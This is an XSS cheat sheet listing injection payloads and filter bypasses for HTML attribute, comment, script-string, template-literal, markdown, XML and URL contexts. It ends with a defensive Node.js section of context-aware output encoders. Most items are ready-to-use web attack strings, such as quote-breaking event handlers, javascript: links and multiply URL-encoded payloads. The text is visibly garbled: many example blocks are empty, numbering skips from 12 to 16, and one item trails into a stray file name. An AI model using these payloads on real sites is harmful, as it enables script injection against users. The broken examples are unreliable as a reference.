# XSS Cheat Sheet (Basic)

1. Basic payload

```html
```

2. Add `'` or `"` to escape the payload from the value of an HTML attribute

```html
">
'>
```

* Example source code

```html
```

* After input of the payload

```html
```

3. Add `-->` to escape the payload if the input lands in an HTML comment.

```html
-->
```

* Example source code

```html
```

* After input of the payload

```html
-->
```

4. Add a tag when the input lands inside or between opening/closing tags; the tag can be

```html
,, ">
```

* Example source code

```html
1
```

* After input of the payload

```html
">1
```

5. Use when the input lands inside an attribute's value of an HTML tag but `>` is filtered

```html
" onmouseover=alert(1)
" autofocus onfocus=alert(1)
```

* Example source code

```html
```

* After input of the payload

```html
```

6. Use when the input lands inside

```html
```

* Example source code

```html
```

* After input of the payload

```html
';
```

# XSS Cheat Sheet (Advanced)

7. Use when the input lands in a script block, inside a string-delimited value.

```html
'-alert(1)-'
'/alert(1)//
```

* Example source code

```html
```

* After input of the payload

```html
```

8. Same as number 7, but the input lands inside a string-delimited value where quotes are escaped by a backslash.

```html
\'alert(1)//
```

* Example source code

```html
```

* If we input the payload `'-alert(1)-'` it will look like this

```html
```

The quotes are escaped by a backslash, so we need to bypass them.

* After input of the payload

```html
```

9. Use when there are multiple reflections in the same line of JS code

```html
/alert(1)//\
/alert(1)}//\
```

* Example source code

```html
```

* After input of the payload

```html
```

10. Use when the input lands inside a string-delimited value and inside a single logical block such as a function or a conditional (if, else, etc.).

```html
'}alert(1);{'
\'}alert(1);{//
```

* Example source code

```html
```

* After input of the payload

```html
```

> The second payload is used when the quote is escaped by a backslash.

11. Use when the input lands inside a backtick-delimited string

```html
${alert(1)}
```

* Example source code

```html
```

* After input of the payload

```html
```

12. Use when there are multiple reflections on the same page (double reflection)

```html
'onload=alert(1)>alert(1)'>alert(1)/*' dapos.jpeg
```

16. XSS with SVG file (file upload)

```
```

17. XSS via markdown

```
[Click Me](javascript:alert('1'))
```

18. XSS in XML page

```
alert(1)
```

> Add a `-->` to the payload if the input lands in a comment section
> Add a `]]>` if the input lands in a CDATA section

# XSS Cheat Sheet (Bypass)

19. Mixed case

```html
```

20. Unclosed tags

```html
```

22. Encoded XSS

```html
(Encoded)
%3Csvg%20onload%3Dalert(1)%3E
(Double Encoded)
%253Csvg%2520onload%253Dalert%281%29%253E
(Triple Encoded)
%25253Csvg%252520onload%25253Dalert%25281%2529%25253E
```

23. JS lowercased input

```html
alert(1)
```

24. PHP email validation bypass

```html
"@gmail.com
```

25. PHP URL validation bypass

```html
javascript://%250Aalert(1)
```

26. Inside comments bypass

```html
```
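Every item above is a different output context (HTML attribute, comment, JS string literal, template literal, URL), and the fix is the matching context-specific encoder. The following Node.js code is an added example, not part of the original cheat sheet; the function names and the `example.invalid` base URL are assumptions, and the inputs in the comments are the cheat sheet's own payloads used as test data.

```javascript
// Context-aware output encoding (Node.js, no dependencies). Added example,
// not code from the original cheat sheet. Each encoder targets one of the
// injection contexts enumerated in the items above.

// HTML text and quoted-attribute context (items 2, 4, 5): entity-encode the
// characters that close a quoted value or open a new tag.
const HTML_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_MAP[c]);
}

// JavaScript string-literal context (items 7-11): every non-alphanumeric
// character becomes \xHH or \uHHHH, so quotes, backslashes, backticks,
// "${" and line terminators can no longer end the literal. The backslash is
// encoded too, so the escaped-quote trick of item 8 has nothing to work on.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// HTML comment context (item 3): entities are not decoded inside comments, so
// the character that matters is the one that can form "-->". Reflecting user
// data into comments is best avoided altogether; this is the fallback.
const COMMENT_MAP = { '-': '&#45;', '<': '&lt;', '>': '&gt;' };
function encodeComment(s) {
  return String(s).replace(/[-<>]/g, (c) => COMMENT_MAP[c]);
}

// URL context (items 17, 25): check the parsed scheme rather than the raw
// string. The URL parser normalises case and leading whitespace, so mixed-case
// schemes and the encoded-newline trick do not slip past the allow-list.
function isSafeHref(href, base = 'https://example.invalid/') {
  try {
    return ['http:', 'https:'].includes(new URL(href, base).protocol);
  } catch (e) {
    return false; // unparseable input is rejected, not passed through
  }
}
```

Relative links resolve against the assumed base, so `/docs/page.html` is accepted while `javascript://%250Aalert(1)` and `JaVaScRiPt:alert(1)` are rejected by scheme.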